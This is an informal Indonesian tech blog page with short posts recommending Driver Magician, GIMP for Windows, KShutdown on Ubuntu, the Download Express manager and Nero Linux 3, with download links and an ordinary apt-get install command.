Yang namanya *indows sering banget diinstall ulang...., Nah...saat install ulang kita sering bingung masalah drivernya... apalagi kalo CD drivernya ilang ato rusak.... Untuk menghadapai permasalahan diatas anda bisa gunakan "Driver Magician".

Driver magician adalah salah satu s/w yang dapat membackup - merestore driver PC anda dan sangat mudah penggunaannya...!
adapun fitur2 dari s/w ini antara lain :
  • Back up device drivers of your computer in four modes.
  • Restore device drivers from backup in one mouse click.
  • Update device drivers of your PC to improve system performance and stability.
  • Uninstall device drivers
  • Live Update device identifier database and driver update database
  • Detect unknown devices
  • Back up more items such as My Documents and Registry.
  • Restore more items from backup.
  • Get detailed information of the hardware drivers.
  • Clone all drivers to an auto-setup package (.EXE), so you can restore drivers without installing Driver Magician.

Download link.....

http://uploads.bizhat.com/file/127391

by=http://www.vanderta.co.cc

Read more


The Gimp 2.6.2 for Windows

Gimp adalah salah satu aplikasi GNU/Linux yang setara dengan Photoshop. Walaupun berlatar belakang Opensource, namun fitur2 yang ada dalam The GIMP tidak kalah lengkapnya dibandingkan dengan program2 yang berbayar lainnya.



Versi terkahir yang dirilis adalah The Gimp versi 2.6.2 yaitu versi stabilnya. Versi ini selain untuk Linux juga tersedia untuk OS *indo*s.

Silakan klik Download untuk mengunduh versi *indo*s
!
v
DOWNLOAD

by=http://www.vanderta.co.cc

Read more


Auto Shutdown with KShutdown on Ubuntu

KShutdown adalah salah satu software utilitas yang digunakan untuk menshutdown, merestart n meng-logoff komputer seseuai keinginan kita. Versi terakhir KShutdown adalah versi 2.0 beta.

Jika anda terkoneksi ke internet, langkah untuk mengistalnya sangat mudah, cukup ketikan perintah dibawah ini :

$ sudo apt-get install kshutdown

Untuk menjalankannya ketik "kshutdown" diterminal anda.

Namun bagi pengguan linux yang lain bisa mendownload nya HERE.
Bagi pengguna **ndows jangan bersedih hati ya,,, karna Kshutdown juga tersedia untuk **ndows. Malah tersedia dalam 2 versi yaitu portable n installer. Silakan Download HERE

Read more


Download Express

Akhirnya bisa menulis lagi di blog tercinta ini,,,
maklum... beberapa hari ini ane lagi ada kesibukan dikit,,, ( menyibukkan diri sendiri xixixixixxi ).
Beberapa waktu yang lalu ane chat dengan om jorboyz,,, trus cerita2 dech masalah download mendownload,,, daripada cerita yang enggak2 ( tul kan ??? )...Udah lupa nich pembahasan awalnya dari mana. Yang jelas UUD-M ( Ujung2nya Download Manager hehehehe ).
Nah,,, pada saat pembahasan ini berlangsung ane nawarin biar om make IDM aja,,, tapi om jorboyz malah nyaranin ane pake Download Expres. Terjadilah pertarungan sengit dsn (kayak film2 kolosal aja). Karena ane masih newbie di alam maya yang luas ini,,, Akhirnya ane nyerah... Begitu kekalahan ane terima,, ane langsung ke TKP untuk membuktikan omongan om jorboyz...
Akhirnya ketemu jg senjata yang ane cari2...Tu senjata langsung ane ambil n diuji kemampuannya... Ini hasilnya -+>

Ternyata hasilnya sangat memuaskan,,, Kemampuannya imbang dengan IDM, malah lebih kencang ( itu pendapat ane )... Selain itu,,, ukurannya jg kecil banget.. hanya 630KB. Emang sich,,, tools ini berbayar,, tapi ada versi free nya jg yang g jauh beda kualitasnya dengan yang versi berbayar... Thanks om jorboyz atas infonya....

Bagi yang berminat,, Download disini

Read more


Nero Linux 3 Ajibb

NeroLinux 3 adalah aplikasi untuk memburning CD/DVD buat Linux,,, APlikasi ini bisa digunakan untuk memburning CD, DVD, Blue-ray n HD DVD...

System Requirements

General

* Linux kernel 2.4 or higher (2.6 recommended) with X-Window
* Glibc 2.3.2 and libstdc++ 6 3.4
* GTK+ 2.4.10 (or higher)

Supported Distributions*

* Red Hat Enterprise Linux 4


* SuSE Linux 10.0


* Fedora 4


* Debian GNU/Linux 3.1


* Ubuntu 5.10


* Linspire 6.0.x


* Nero Linux 3 supports all higher versions of the above supported distributions



by=http://www.vanderta.co.cc

Read more